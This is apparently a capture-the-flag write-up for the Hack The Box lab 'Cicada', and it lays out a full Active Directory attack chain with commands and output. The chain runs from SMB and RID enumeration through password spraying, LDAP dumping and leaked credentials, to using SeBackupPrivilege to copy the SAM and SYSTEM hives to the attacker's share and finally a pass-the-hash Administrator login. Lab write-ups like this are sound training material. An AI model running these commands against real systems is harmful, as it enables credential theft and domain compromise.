Windows - Easy - Cicada

Created At: Updated At:
Keywords: sebackuppriv smb windows

Recon

nmap tcp scan returns nothing.

$sudo nmap -p- -A 10.129.231.149
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-28 08:49 UTC
Nmap scan report for 10.129.231.149
Host is up (0.048s latency).
Not shown: 65522 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-11-28 15:51:27Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
60281/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022 (89%)
Aggressive OS guesses: Microsoft Windows Server 2022 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: 6h59m58s
| smb2-time: 
|   date: 2024-11-28T15:52:30
|_  start_date: N/A

TRACEROUTE (using port 53/tcp)
HOP RTT      ADDRESS
1   32.09 ms 10.10.16.1
2   64.41 ms 10.129.231.149

Starting with SMB, we can find two nonstandard discs, DEV and HR.

We cannot log into DEV disc with anonymus, but we can into HR. In there we can find a greeting message from HR with some interesting content.

Dear new hire!

Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.

Your default password is: Cicada$M6Corpb*@Lp#nZp!8

To change your password:

1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.

Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.

If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.

Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!

Best regards,
Cicada Corp

We cannot enumerate users using rpcclient.

$rpcclient -U "" 10.129.126.15
Password for [WORKGROUP\]:
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED

The same is true for windapsearch.

$./windapsearch.py --dc-ip 10.129.126.15 -u "" -U
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.129.126.15
[+] Getting defaultNamingContext from Root DSE
[+]	Found: DC=cicada,DC=htb
[+] Attempting bind
[+]	...success! Binded as: 
[+]	 None

[+] Enumerating all AD users
[!] Error retrieving users
[!] {'msgtype': 101, 'msgid': 3, 'result': 1, 'desc': 'Operations error', 'ctrls': [], 'info': '000004DC: LdapErr: DSID-0C090C78, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v4f7c'}

Running netexec finally got me something:

nxc smb 10.129.126.15 -u guest -p '' --rid-brute
SMB         10.129.126.15   445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.126.15   445    CICADA-DC        [+] cicada.htb\guest: 
SMB         10.129.126.15   445    CICADA-DC        498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.126.15   445    CICADA-DC        500: CICADA\Administrator (SidTypeUser)
SMB         10.129.126.15   445    CICADA-DC        501: CICADA\Guest (SidTypeUser)
SMB         10.129.126.15   445    CICADA-DC        502: CICADA\krbtgt (SidTypeUser)
SMB         10.129.126.15   445    CICADA-DC        512: CICADA\Domain Admins (SidTypeGroup)
SMB         10.129.126.15   445    CICADA-DC        513: CICADA\Domain Users (SidTypeGroup)
SMB         10.129.126.15   445    CICADA-DC        514: CICADA\Domain Guests (SidTypeGroup)
SMB         10.129.126.15   445    CICADA-DC        515: CICADA\Domain Computers (SidTypeGroup)
SMB         10.129.126.15   445    CICADA-DC        516: CICADA\Domain Controllers (SidTypeGroup)
SMB         10.129.126.15   445    CICADA-DC        517: CICADA\Cert Publishers (SidTypeAlias)
SMB         10.129.126.15   445    CICADA-DC        518: CICADA\Schema Admins (SidTypeGroup)
SMB         10.129.126.15   445    CICADA-DC        519: CICADA\Enterprise Admins (SidTypeGroup)
SMB         10.129.126.15   445    CICADA-DC        520: CICADA\Group Policy Creator Owners (SidTypeGroup)
SMB         10.129.126.15   445    CICADA-DC        521: CICADA\Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.126.15   445    CICADA-DC        522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.129.126.15   445    CICADA-DC        525: CICADA\Protected Users (SidTypeGroup)
SMB         10.129.126.15   445    CICADA-DC        526: CICADA\Key Admins (SidTypeGroup)
SMB         10.129.126.15   445    CICADA-DC        527: CICADA\Enterprise Key Admins (SidTypeGroup)
SMB         10.129.126.15   445    CICADA-DC        553: CICADA\RAS and IAS Servers (SidTypeAlias)
SMB         10.129.126.15   445    CICADA-DC        571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.129.126.15   445    CICADA-DC        572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.129.126.15   445    CICADA-DC        1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB         10.129.126.15   445    CICADA-DC        1101: CICADA\DnsAdmins (SidTypeAlias)
SMB         10.129.126.15   445    CICADA-DC        1102: CICADA\DnsUpdateProxy (SidTypeGroup)
SMB         10.129.126.15   445    CICADA-DC        1103: CICADA\Groups (SidTypeGroup)
SMB         10.129.126.15   445    CICADA-DC        1104: CICADA\john.smoulder (SidTypeUser)
SMB         10.129.126.15   445    CICADA-DC        1105: CICADA\sarah.dantelia (SidTypeUser)
SMB         10.129.126.15   445    CICADA-DC        1106: CICADA\michael.wrightson (SidTypeUser)
SMB         10.129.126.15   445    CICADA-DC        1108: CICADA\david.orelious (SidTypeUser)
SMB         10.129.126.15   445    CICADA-DC        1109: CICADA\Dev Support (SidTypeGroup)
SMB         10.129.126.15   445    CICADA-DC        1601: CICADA\emily.oscars (SidTypeUser)

We can now look for a new worker in this company. I’ve created a file users.txt with the following contents:

Administrator
Guest
krbtgt
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars

and then run crackmapexec smb 10.129.126.15 -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'.

Time to get in as michael.wrightson. Logging in to /DEV with smb didnt allow us to do anything either. Using this user we can dump all of the ldap with ldapdomaindump -u 'cicada.htb\michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' 10.129.126.15 -o dump. Looking for passwords within the dump with cat ./* | grep password, we can find "Just in case I forget my password is aRt$Lp#7t*VQ!3" in the description of user david.orelious. We finally get /DEV.

Contents of Backup_script.ps1:

$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"

$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"

Another user and password, emily.oscars : Q!3@Lp#M6b*7t*Vt. This one finally can log in via WinRM, so we are in.

evil-winrm -i 10.129.126.15 -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt'

Priv esc

We can learn that user Emily has quite a few privs. We can abuse SeBackupPriv for escalation for sure.

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

We can then create a smb share and connect to it from windows using net use \\10.10.16.9\shared. Go to C:\Temp and copy system info, then tranfer files to our shared folder back.

On windows:
reg save hklm\sam C:\temp\sam.hive
reg save hklm\system C:\temp\system.hive
cp C:\temp\* .\

On linux:
/usr/share/doc/python3-impacket/examples/secretsdump.py -sam sam.hive -system system.hive LOCAL

Then we get:

Impacket v0.11.0 - Copyright 2023 Fortra

[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up...

By passing the hash, we are in!
evil-winrm -i 10.129.126.15 -u "Administrator" -H 2b87e7c93a3e8a0ea4a581937016f341